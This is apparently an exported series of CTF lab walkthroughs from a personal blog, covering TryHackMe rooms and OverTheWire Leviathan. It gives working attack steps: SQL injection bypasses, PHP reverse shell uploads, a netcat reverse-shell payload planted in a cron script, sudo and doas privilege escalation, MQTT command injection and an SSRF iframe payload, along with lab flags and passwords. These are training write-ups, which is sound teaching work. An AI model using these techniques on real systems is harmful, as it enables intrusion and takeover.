to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lesson-learned-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LESSON LEARNED-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gallery” GALLERY-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gallery”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start with visiting the victim IP and we see the default Apache Page\nNow moving to nmap:\nnmap 10.10.80.251 -O -sVports 80 and 8080 open. Port 80 was nothing major — so I checked 8080\n2 ports openOpened http://10.10.80.251:8080 — displayed a simple login form\nEntered SQL injection payload into the form\nUsername: admin’ or 1=1 #\nClicking enter we are in the cms portal\nSimple Image GalleryInside the dashboard, went to User Profile → found an Upload section\nPrepared a PHP reverse shell payload (php-rev-shell.php)\nIn my terminal :\nnc -lvnp 4444Triggered the file — got a shell connection back\nThen Stabilizing the shell as I had an some unresponsive states and errors\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’stty raw -echo; fgresetNow inside the shell:\ncd /home/mikels -lacat user.txtIt shows permission denied\nI immediately head to /var -\u0026gt; /backup\ncat .backup_historysudo -lb3stpassw0rdbr0xxNow Interpreted as sudo -l and the password b3stpassw0rdbr0xx for Mike\nUsing this pasword to access mike\nsu mikeb3stpassw0rdbr0xxAfter login:\ncd /home/mikecat user.txtThen we get user.txt flag:\nTHM{af05cd30bfed67849befd546ef}Now moving to root escalation\nChecking sudo -lOutput: allowed sudo /bin/bash /opt/rootkit.sh without password.\nViewed the script\ncat /opt/rootkit.shSaw it used nano for editing\nRun\nsudo /bin/bash /opt/rootkit.shInside Nano: used the read command to inject:\nctrl + rctrl + xpress enterpaste this : reset; sh 1\u0026gt;\u0026amp;0 2\u0026gt;\u0026amp;0press enter and you will see the #Now in the shell enter /root\ncd /rootls -lacat root.txtTHM{ba87e0dfe5903adfa6b8b450ad7567bafde87}Now we need to find the hash so for that I had to follow the script which I came across in a video by Tyler Rambsey\nIn terminal\nwget https://raw.githubusercontent.com/musyoka101/Simple-Image-Gallery-1.0-blind-SQL-Injection/.../exploit.pyThen\nchmod +x exploit.pyRunning the script:\npython3 exploit.py http://10.10.80.251:8080/After 3–4 minutes we get the output:\na228b12a08b6527e7978cbe5d914531cCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/gallery-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GALLERY-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium-level room from the TryHackMe platform titled “CTF Collection Vol 2”, shoutout to DesKel for putting this… CTF-COLLECTION-VOLUME 2Hello everyone! This is a medium-level room from the TryHackMe platform titled “CTF Collection Vol 2”, shoutout to DesKel for putting this amazing room out It was actually super fun working on this\nI hope this write-up helps guide you through the process!\nI have also put the flags in order towards the end\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nAfter loading the page, I first started scrolling through the page and a shiny red button caught my eye.\nClicking it opened a new tab — and bam, flag #1 appeared:\nTHM{1_c4n’7_b3l13v3_17} — -\u0026gt; Easter 13Next the classic! I checked the /robots.txt crawlers and I came across a hex string and simple decode through CyberChef and I get the flag:\nTHM{4u70b07_r0ll_0u7} — -\u0026gt; Easter 1Above that hex, I discovered a mysterious Base64 string.\nAfter four rounds of decoding, I got DesKel_secret_base.\nVisiting that path led me to a secret image of the SUPREME LEADER.\nInspecting the page I uncovered the next flag:\nTHM{f4ll3n_b453} — -\u0026gt; Easter 2Next as per the Easter 4 hint I ran the dir buster using common.txt wordlist\ngobuster dir -u http://10.10.98.47/ -w common.txtThat led me to /small, where I struck gold and got the flag for Easter 19:\nTHM{700_5m4ll_3yy} — -\u0026gt; Easter 19Then accessing /login, I tried typical SQLi tricks — but no dice. The flag was hiding in the HTML source instead:\nTHM{y0u_c4n’7_533_m3} — -\u0026gt; Easter 3Then moving to Easter 4, the hint suggested SQLI and I decided to utilize SQLMAP for it:\nFirst I launch burpsuite on the login page and capture the post request while I tried some basic credentials\nThen right click and save it and it is saved as a.xml for me.\nNext, I open terminal and use sqlmap:\nsqlmap -r a — current-dbwe see the database found as: THM_f0und_m3now to search the tables associated to it\nsqlmap -r a -D THM_f0und_m3 — tablesthen I see table names: user \u0026amp; nothing inside. I decide to check user first\nsqlmap -r a -D THM_f0und_m3 -T user — columnsThis gives username and password:\n‘DesKel,05f3672ba34409136aa71b8d00070d1b’Now the password clearly looks like a hash which needs to be decoded so I take it and paste in crackstation and it gets decoded as “cutie”\nAnd I get the flag for Easter 5:\nTHM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql} — -\u0026gt; Easter 5Now going with the other table:\nsqlmap -r a -D THM_f0und_m3 -T nothing_inside — columnswe see table Easter_4\nsqlmap -r a -D THM_f0und_m3 -T nothing_inside -C Easter_4 — sql-query “select Easter_4 from nothing_inside”this gives the flag:\nTHM{1nj3c7_l1k3_4_b055} — -\u0026gt; Easter 4Next with the hint for Easter 6, I’m going to utilize curl:\nUsing curl to fetch HTTP headers into a file:\ncurl -s http://10.10.98.47 -D headers.txtFound header containing:\nTHM{l37'5_p4r7y_h4rd} — -\u0026gt; Easter 6Next again the clue mentions “cookies” so I rush into inspecting the page and heading to cookies\nFound a cookie (visited=0).\nChanged value to 1\nReloaded page → flag displayed:\nTHM{w3lc0m3!_4nd_w3lc0m3} — -\u0026gt; Easter 7The next challenge is related to the user-header\nUsed Burp to capture requests so I Modified User-Agent: to a custom string.\nTHM{h3y_r1ch3r_wh3r3_15_my_k1dn3y} — -\u0026gt; Easter 8The next one hints “moves fast”, now since I did a light recon of scrolling through and seeing the functionality I did remember seeing a quick double redirection ( If I may term it that way)\nSo clicking the red button, on the 1st redirect I inspect the page and see the flag there:\nTHM{60nn4_60_f457} — -\u0026gt; Easter 9The next one gives us a hint about referer.\nI see the gift voucher page which is the free sub and capture the request in BurpSuite and send it to the Repeater\nthen as hinted I add → referer : tryhackme.com\nTHM{50rry_dud3} — -\u0026gt; Easter 10Then I couldn’t control myself and had to go play the game which I saw during my scrolling sessions lol\nI went through it and it seemed like a little puzzle just to decode and for this specific challenge I took the manual route which I do not recommend as It isn’t the conventional route:\nFrom my solvings I found : v=14, a=89, e=93, M=77, r=10, 9=14, 5=10, O=126, G=51\nand that spell GameOver, which lead me to the flag :\nTHM{ju57_4_64m3} — -\u0026gt; Easter 15Going to game 2, it says press all 3 buttons together.\nSo I immediately launch burp and capture the request and and send it to repeater. Then. just modify the request to ensure all 3 buttons are submitted as input\nbutton1=button1\u0026amp;submit=submit\u0026amp;button2=button2\u0026amp;submit=submit\u0026amp;button3=button3\u0026amp;submit=submitThat gives me the flag:\nTHM{73mp3r_7h3_h7ml} — -\u0026gt; Easter 16Next back in the page Inspecting it I see the the long binary numbers. It is base 2 format so convert to decimal:\nIn terminal start python:\npython3b=’0101' =\u0026gt; d=int(b,2)Then getting the decimal I take it and convert it to Hex using online tool, followed by Hex to ASCII\nTHM{j5_j5_k3p_d3c0d3} — -\u0026gt; Easter 17Then going back to Easter 11, utilizing egg I guess has to be the only way so In the menu I try selecting DesKel option and it shows “how dare you?”.\nI launch burpsuite capture the request and in repeater I modify the food item as egg\nThat leads me to the flag:\nTHM{366y_b4k3y} — -\u0026gt; Easter 11Then Easter 12 challenge hint says fake js file, so I inspect the page and the j-query file immediately catches my attention.\nClicking on it I see a string which is hex and converting it I get the flag:\nTHM{h1dd3n_j5_f1l3} — -\u0026gt; Easter 12Then for Easter 14 it is to do with image rendering and we will use cyberchef to solve this\nWe take the entire base 64 string and put it in cyberchef and to bake it we use the image rendering feature and we see the THM logo with the flag right there:\nTHM{d1r3c7_3mb3d} — -\u0026gt; Easter 14Now moving to Easter 18:\nI see egg pan picture, it says say yes to egg.\negg:yesI launch BurpSuite and capture the request and have it on repeater, here I modify the request by putting-\nAfter sending the request , It immediately gives the flag:\nTHM{70ny_r0ll_7h3_366} — -\u0026gt; Easter 18Now for the final flag which is the Easter 20\nIn the bottom of the source there is a user pass for post request for easter 20 and already giving us the username and password\nNow I am going to use curl again an get the flag:\ncurl -s -d “username=DesKel\u0026amp;password=heIsDumb” -X POST http://10.10.98.47/ | grep -A1 “easter 20”-d \"username=DesKel\u0026amp;password=heIsDumb\"Data payload sent via POST.This mimics a login form submission with credentials:username = DesKelpassword = heIsDumb-X POSTSpecifies the HTTP method to use: POST.grep -A1 \"easter 20\"Pipe (|) passes the HTML output of the server to grep.grep searches for \"easter 20\" in the returned HTML.-A1 tells grep to also print 1 line after the matching line (which contains the flag).and I get the flag:\nTHM{17_w45_m3_4ll_4l0n6} — -\u0026gt; Easter 20ALL FLAGSEaster 1: THM{4u70b07_r0ll_0u7}Easter 2: THM{f4ll3n_b453}Easter 3: THM{y0u_c4n’7_533_m3}Easter 4: THM{1nj3c7_l1k3_4_b055}Easter 5: THM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql}Easter 6: THM{l37'5_p4r7y_h4rd}Easter 7: THM{w3lc0m3!_4nd_w3lc0m3}Easter 8: THM{h3y_r1ch3r_wh3r3_15_my_k1dn3y}Easter 9: THM{60nn4_60_f457}Easter 10: THM{50rry_dud3}Easter 11: THM{366y_b4k3y}Easter 12: THM{h1dd3n_j5_f1l3}Easter 13: THM{1_c4n’7_b3l13v3_17}Easter 14: THM{d1r3c7_3mb3d}Easter 15: THM{ju57_4_64m3}Easter 16: THM{73mp3r_7h3_h7ml}Easter 17: THM{j5_j5_k3p_d3c0d3}Easter 18: THM{70ny_r0ll_7h3_366}Easter 19: THM{700_5m4ll_3yy}Easter 20: THM{17_w45_m3_4ll_4l0n6}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nThough it was a medium level room it was fun to work on the challenges Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"8 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ctf-collection-volume-2/","section":"Security Labs \u0026 Writeups","summary":"","title":"CTF-COLLECTION-VOLUME 2","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Plotted” PLOTTED-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Plotted”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by loading the target IP:\nhttp://10.10.172.50\nIt displays a default Apache page, so we move to enumeration\nImmediately kicking in nmap:\nnmap -O -sV 10.10.172.50Open ports:22 (SSH)80 (HTTP)445 (HTTP again, possibly misconfigured or bound differently)Run directory buster on both ports 80 \u0026amp; 445\ngobuster dir -u http://10.10.172.50 -w /usr/share/dirb/wordlists/common.txtFinds:\n/admin → Base64-encoded hint/passwd, /shadow → Fake but suggest file system spoofinggobuster dir -u http://10.10.172.50:445 -w /usr/share/dirb/wordlists/common.txtFinds:\n/management → Bingo!!Then visiting the above:\nhttp://10.10.172.50:445/managementIt leads to a Traffic Offense Management System\nTry classic SQL injection at login:\nadmin’ or 1=1 #It works and leads us in the page which looks like the admins portal\nIn the profile section, there’s a file upload field for avatars.\nUse a PHP reverse shellModify IP and port accordinglyUpload the PHP reverse shell, trigger it via web browser:\nhttps://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.phpThen opening listener in the terminal :\nnc -lvnp 4444Catch the Shell and then we upgrade shell:\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’This upgrades your “dumb” shell to a fully interactive TTY (Teletypewriter) shell.\npython3 -c '...': This executes the Python code within the single quotes.import pty: This imports the pty module in Python. The pty module provides functions for pseudo-terminal utilities.pty.spawn(\"/bin/bash\"): This is the core of the command. It spawns a new process, in this case, /bin/bash (the Bash shell), and connects its controlling terminal to the current process's standard I/O through a pseudo-terminalNavigate to user home:\ncd /homels -lacd plot_admincat user.txtBut we get: # Permission denied\nLet’s check scheduled tasks:\ncat /etc/crontab/etc/crontab: This specific file is the system-wide crontab. It contains jobs scheduled by the system administrator or installed by various software packages. Unlike user-specific crontabs, the /etc/crontab file has an additional field for the user under which the command should be executed.\nthen I find:\nplot_admin /var/www/scripts/backup.sh\nBack in shell:\ncd /var/www/scriptsrm backup.shCreate new malicious backup.sh(In another terminal tab):\nnano backup.shPaste this rev shell payload:\nrm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.9.1.119 5555 \u0026gt;/tmp/fServe it with Python:\npython3 -m http.serverBack in compromised shell:\nwget http://10.9.1.119:8000/backup.sh -O backup.shchmod +x backup.shStart another listner:\nnc -lvnp 5555Wait for the cronjob to execute — then you catch a new shell\nFrom the new shell:\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’cd /home/plot_admincat user.txt77927510d5edacea1f9e86602f1fbadbNow to escalate privilege:\nThis system is running OpenBSD and uses doas (similar to sudo)\ncat /etc/doas.confthen we see this : permit nopass plot_admin as root cmd /usr/bin/openssl\nThis means you can run OpenSSL as root.\nCheck GTFOBins OpenSSL → we can use it to read root files.\nopenssl | GTFOBinsIt can send back a reverse shell to a listening attacker to open a remote network access. It can exfiltrate files on…gtfobins.github.ioLFILE=/root/root.txtdoas -u root openssl enc -in “$LFILE”Then we get the root flag:\n53f85e2da3e874426fa059040a9bdcabCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/plotted-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PLOTTED-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bugged” BUGGED-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bugged”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by loading the victim IP and performing nmap:\nnmap -p1–2000 — min-rate=1000 -T4 -Pn 10.10.101.222-p1-2000=\u0026gt;Scan ports 1 to 2000 (faster, smaller range)\n--min-rate=1000=\u0026gt;Force at least 1000 packets/second (fast scan)\n-T4=\u0026gt;Use aggressive timing (fast but stable)\n-Pn=\u0026gt; Skip ping — assume host is up\nPort 1883 open → this is MQTT, a lightweight messaging protocol often used in IoT.\nNow, Install Mosquitto (MQTT client tools):\nsudo apt install mosquitto mosquitto-clientsNext, connect to MQTT Broker:\nmosquitto_sub -h 10.10.101.222 -t “#” -v# → wildcard to subscribe to all topics.-v → show topic names with message.\nThen while the appliances are showing up I see the base 64 string which catches my attention, so going to cyber chef decoding the base 64 string:\n{ “id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “registered_commands”: [“HELP”, “CMD”, “SYS”], “pub_topic”: “U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”, “sub_topic”: “XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”}\nNow using pub_topic:\nmosquitto_pub -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub -h 10.10.101.222 -m “hello”This shows “hello” as it is and not encoded\nTrying out the sub_topic:\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “hello”Now we get a base64-encoded string and when I decode it there is an error statement but that gives us the hint\nUsing the data we have from the inital output and recrafting:\n{ “id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “ls”}\nand converting it to base-64:\neyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==\nNow sending it:\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==”The response shows the flag.txt file existing since we gave ls as the query\nNow we reconstruct the command so as to read the flag.txt file and get the flag\nThis is the encoded base-64:\neyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=\nand now sending it :\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=”That leads us to the flag:\nflag{18d44fc0707ac8dc8be45bb83db54013}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bugged-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"BUGGED-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “W1SE GUY” W1SE GUY-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “W1SE GUY”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by visiting the target room and downloading the file provided.\nInside the file, we see a fake flag string along with a hint:\nAs per the challenge instructions:Port 1337 is open — and we can connect to it with Netcat.\nnc 10.10.254.116 1337It displays\nXOR Encrypted Text:24231f1805410a3e0d013513262201045f31081631052050141c272b0b20021f2b530002131d1108\nUnderstand XOR EncryptionHow XOR works in simple terms:\nIt’s a reversible operation:Plaintext ⊕ Key = CiphertextCiphertext ⊕ Key = PlaintextIf you know either the plaintext format or the key, you can recover the other.In this challenge, we know the flag format is always: THM{…….}\nSo we can XOR “THM{“ against the first few bytes of the ciphertext to recover the key\nThe XORED Value:\n24231f1805410a3e0d013513262201045f31081631052050141c272b0b20021f2b530002131d1108Go to CyberChefSelect From Hex → XOR → To HexInput the Xored Value into the Input field.For Key:First, copy the first 8 hex characters → 24231f18XOR it against \"THM{\" → this gives \"pkRc\" — your starting key.Now use \"pkRc\" as the key in CyberChef.Paste the full Xored Value.Start appending additional characters to the key (0–9 \u0026amp; a-z) to fully decrypt the message.When you try \"pkRcu\":The full decrypted flag is revealed:THM{P1alnTExtATt4ckCAnr3AlLyhurty0UrxOr}Next,\nBack in the terminal prompt enter: pkRcu\nIt responds with the final flag:\nTHM{BrUt3_ForC1nG_XOR_cAn_B3_FuN_nO?}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"29 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/w1se-guy-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"W1SE GUY-TRY HACK ME-ROOM","type":"writeups"},{"content":" Leviathan is a great beginner-friendly wargame from OverTheWire that introduces local enumeration, binary exploitation, and basic privilege… OVER THE WIRE — LEVIATHANLeviathan is a great beginner-friendly wargame from OverTheWire that introduces local enumeration, binary exploitation, and basic privilege escalation — all in a safe CTF-style lab.\nTo work on this, we will need to enter through SSH access.\nAs mentioned in the website, we need to use port 2223 and ssh into it\nLevel 0 credentials are already given:\nUsername: leviathan0Password: leviathan0\nssh leviathan0@leviathan.labs.overthewire.org -p 2223# Password: leviathan0Once in :\nTo see the files present\ncd /etc/leviathan_passls -ladrwxr-x — — 2 leviathan1 leviathan0 4096 Apr 10 14:23 .backupcd .backupls -la-rw-r — — 1 leviathan1 leviathan0 133259 Apr 10 14:23 bookmarks.htmlNow in this bookmarks.html, we need to find the password and we are using grep for that:\ncat bookmarks.html | grep password\u0026lt;DT\u0026gt;\u0026lt;A HREF=”http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq” ADD_DATE=”1155384634\" LAST_CHARSET=”ISO-8859–1\" ID=”rdf:#$2wIU71\"\u0026gt;password to leviathan1\u0026lt;/A\u0026gt;\nThe password: 3QJ3TgzHDqNow moving on to the next challenge:\nssh leviathan1@leviathan.labs.overthewire.org -p 2223Then we use ls to see the files present\nls -laHere we see: check\nso I perform cat check\nbut that shows compiled binaries so I perform :\nstrings checkand this catches my eyes:\n__gmon_start__secrlovepassword: /bin/shWrong password, Good Bye …\nBut strings doesn’t tell us how the program checks the password. So we move to:\nltrace ./checkWhy ltrace?\nIt shows dynamic function calls from shared libraries like strcmp(), printf(), getchar(), etc.It’s perfect for spotting what your input is compared to inside a binary.It prompts for a password: I try pass but it shows wrong password but then I notice what’s written in the message “strcmp”\nThe binary is comparing your input pas to the hardcoded string \"sex\"\nnow running it again and entering the password correctly while running it:\n./checkpassword: sexit gives you shell access and we know that because we see this also: system(“/bin/sh”)\ncd /etc/leviathan_passls -lawe see: leviathan2\ncat leviathan2and BOOM! we get the password\nNsN1HwFoyNNow onto the next challenge:\nssh leviathan2@leviathan.labs.overthewire.org -p 2223ls -laHere I see: printfile\nltrace ./printfileI try ltrace printfile but nothing:\n__libc_start_main(0x80490ed, 1, 0xffffd484, 0 \u0026lt;unfinished …\u0026gt;puts(“*** File Printer ***”*** File Printer ***) = 21printf(“Usage: %s filename\\n”, “./printfile”Usage: ./printfile filename) = 28+++ exited (status 255) +++\ncd homels -laNow while looking at the access levels granted: /tmp has root access so I create a file pass i.txt\nnano “/tmp/pass i.txt”then\n./printfile “/tmp/pass i.txt”This is the password:\nf0n8h2iWLPCONCLUSION:This was a short write-up covering the first three challenges in Leviathan. I’ve broken it down in a way that hopefully makes it easier to follow — especially as I worked through it alongside a colleague to better understand each step.\nIf you’re stuck at any point or have questions about a step, feel free to drop a comment — I’ll make sure to walk you through it.\n","date":"26 June 2025","externalUrl":null,"permalink":"/writeups/overthewire/over-the-wire-leviathan/","section":"Security Labs \u0026 Writeups","summary":"","title":"OVER THE WIRE — LEVIATHAN","type":"writeups"},{"content":"","date":"26 June 2025","externalUrl":null,"permalink":"/writeups/overthewire/","section":"Security Labs \u0026 Writeups","summary":"","title":"OverTheWire Wargames","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “MD2PDF” MD2PDF-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “MD2PDF”\nThis room is classified as an easy room. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe begin by visiting the victim IP Address:\nhttp://10.10.152.252Here, the application provides a text box where we can input content (Markdown), and then convert it into a PDF by clicking a “Process” button.\nOnce processed, a new browser tab opens showing the PDF version of what you entered. This tells us right away that:\nThe application is rendering your input on the server side into a PDF.\nNow launching nmap and feroxbuster:\nnmap -O -sV 10.10.152.252Shows standard HTTP service, no unexpected open ports on the surface\nferoxbuster -u http://10.10.152.252 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtand through this we see :\n/admin\nThen we follow this : http://10.10.152.252/admin\nIt shows forbidden and even the local host port 5000 is prompted so we try the same yet nothing but a small version text box\nhttp://10.10.152.252:5000/admin\nUnderstanding the working:\nIt takes user input (Markdown or HTML).It renders this content server-side into a PDF.The rendered content could include HTML tags like \u0026lt;iframe\u0026gt;, \u0026lt;img\u0026gt;, etc.So if we embed a link to a local resource (like localhost:5000), and if the renderer fetches and embeds that, we have a working SSRF (Server-Side Request Forgery)Here’s the payload used:\n\u0026lt;iframe src=”http://localhost:5000/admin”\u0026gt;\u0026lt;/iframe\u0026gt;\n\u0026lt;iframe\u0026gt; allows embedding another page inside your current document.When the PDF is rendered server-side, the application fetches content from the provided src.Since localhost refers to the server’s own loopback address, this effectively tricks the server into sending a request to its internal admin page — a request you cannot make directly.Now when this payload is pasted here, the internal /admin page is embedded right inside the rendered document.\nInside the PDF, the flag is revealed:\nflag{1f4a2b6ffeaf4707c43885d704eaee4b}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"22 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/md2pdf-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"MD2PDF-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a very easy room from the TryHackMe platform titled “Cyber Heroes” CYBER HEROES-TRY HACK ME-ROOMHello everyone! This is a very easy room from the TryHackMe platform titled “Cyber Heroes”\nThis room is classified as easy and is actually super easy. I hope this write-up helps guide you through the process!\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe begin by visiting the target IP provided by the TryHackMe room:\nYou’ll see a styled landing page, possibly superhero-themed — but nothing visibly useful at first glance.\nNext I Click the “Login” button in the top navigation bar to reach the login form.\nTried some common default credentials like:\nadmin / admin test / testbut no luck.\nTime to inspect the login page source.\nLooking through I found this :\na.value == “h3ck3rBoi” \u0026amp;\u0026amp; b.value == RevereString(“54321@terceSrepuS”)\nThis shows us the login is validated client-side (bad practice), and the credentials are hardcoded in JavaScript!\nThere’s a function RevereString() being used on the password — clearly a typo for ReverseString().\nNow reverse the String:\nReverse of “54321@terceSrepuS” → SuperSecret@12345\nFinal credentials:\nUsername: h3ck3rBoiPassword: SuperSecret@12345Log in using the credentials above.\nYou’re redirected to a page that immediately reveals the flag:\nflag{edb0be532c540b1a150c3a7e85d2466e}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"17 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/cyber-heroes-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"CYBER HEROES-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent T” AGENT T-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent T”\nThis room is classified as easy type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, head to the target IP in your 